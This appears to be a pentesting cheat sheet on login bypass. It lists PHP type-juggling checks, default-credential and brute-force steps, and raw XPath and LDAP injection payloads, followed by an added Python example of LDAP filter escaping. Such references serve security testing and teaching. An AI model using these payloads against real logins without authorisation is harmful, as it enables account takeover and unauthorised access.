Login Bypass

Bypass regular login

If you find a login page, here you can find some techniques to try to bypass it:

  • Check for comments inside the page (scroll down and to the right?)
  • Check if you can directly access the restricted pages
  • Check not sending the parameters (do not send any, or only 1)
  • Check for the PHP comparison error: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b
  • Check credentials:
    • Default credentials of the technology/platform used
    • Common combinations (root, admin, password, name of the tech, default user with one of these passwords).
    • Create a dictionary using Cewl, add the default username and password (if there are any) and try to brute-force it using all the words as usernames and passwords
    • Brute-force using a bigger dictionary (Brute force)

SQL Injection authentication bypass

Here you can find several tricks to bypass the login via SQL injections.

In the following page you can find a custom list to try to bypass login via SQL Injections:

{% page-ref page="sql-login-bypass.md" %}

NoSQL Injection authentication bypass

Here you can find several tricks to bypass the login via NoSQL Injections.

As NoSQL Injections require changing the parameter values, you will need to test them manually.

XPath Injection authentication bypass

Here you can find several tricks to bypass the login via XPath Injection.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection authentication bypass

Here you can find several tricks to bypass the login via LDAP Injection.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
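
Why the LDAP inputs above work against a login that interpolates request parameters into a filter, and how RFC 4515 escaping neutralises them. This is an added example, not code from the original page; the filter template, the attribute names (uid, userPassword) and the helper names are assumptions for illustration.

```python
# Added example, not from the original page. The filter template and the
# attribute names (uid, userPassword) are assumptions for illustration.
FILTER_TEMPLATE = "(&(uid={user})(userPassword={pwd}))"

# Characters RFC 4515 requires to be escaped inside an assertion value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Replace LDAP filter metacharacters with their \\XX hex escapes."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(user: str, pwd: str) -> str:
    """Vulnerable pattern: raw interpolation of request parameters."""
    return FILTER_TEMPLATE.format(user=user, pwd=pwd)


def build_filter_safe(user: str, pwd: str) -> str:
    """Hardened pattern: every user-supplied value is escaped first."""
    return FILTER_TEMPLATE.format(
        user=escape_filter_value(user), pwd=escape_filter_value(pwd))


def filter_shape(ldap_filter: str) -> str:
    """Keep only structural characters: parentheses, wildcards and the
    operators & | ! that directly follow '('. Escaped bytes are data."""
    shape, i = [], 0
    while i < len(ldap_filter):
        ch = ldap_filter[i]
        if ch == "\\":  # a \XX escape is three characters of data
            i += 3
            continue
        if ch in "()*" or (ch in "&|!" and i > 0 and ldap_filter[i - 1] == "("):
            shape.append(ch)
        i += 1
    return "".join(shape)


# Shape of the filter for an ordinary login (constructed sample values).
EXPECTED_SHAPE = filter_shape(build_filter_safe("alice", "secret"))


def alters_query(builder, user: str, pwd: str) -> bool:
    """True if the built filter no longer has the intended structure."""
    return filter_shape(builder(user, pwd)) != EXPECTED_SHAPE
```

The same shape comparison can be used in a regression test for a login handler: any input that changes the filter's structure indicates a value that reached the query unescaped.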